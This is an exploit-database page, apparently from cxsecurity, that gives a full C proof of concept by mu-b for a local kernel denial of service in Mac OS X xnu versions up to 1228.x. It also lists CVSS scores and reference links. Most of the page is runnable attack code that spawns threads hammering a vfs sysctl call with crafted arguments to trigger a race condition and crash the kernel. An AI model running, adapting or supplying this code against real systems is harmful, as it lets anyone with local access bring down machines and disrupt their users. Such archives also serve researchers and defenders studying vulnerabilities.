Mac OS X xnu <=1228.x (vfssysctl) Local Kernel DoS PoC

2009.04.05
Credit: mu-b
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-362


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* xnu-vfssysctl-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.x local kernel DoS POC
 * by mu-b - Wed 19 Nov 2008
 *
 * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>

void
hammer (void *arg)
{
  char buf[1024 * (255 + 1)];
  int n, name[6];

  memset (buf, 0, sizeof buf);

  while (1)
    {
      name[0] = CTL_VFS;
      name[1] = 17;
      name[2] = HFS_SET_PKG_EXTENSIONS;
      name[3] = (int) buf;
      name[4] = 1024;
      name[5] = (rand () % 254) + 1;

      n = sysctl (name, 6, NULL, NULL, NULL, 0);
      usleep(10);
    }
}

int
main (int argc, char **argv)
{
  int i, n, tid;

  printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  for (i = 0; i < 4; i++)
    {
      n = pthread_create (&tid, NULL, hammer, NULL);
      if (n < 0)
        {
          fprintf (stderr, "failed creating hammer thread\n");
          return (EXIT_FAILURE);
        }
    }

  while (1)
    sleep (1);

  /* not reached! */
  return (EXIT_SUCCESS);
}

References:

http://www.securityfocus.com/bid/34202
http://www.milw0rm.com/exploits/8265
http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c



Copyright 2021, cxsecurity.com

 
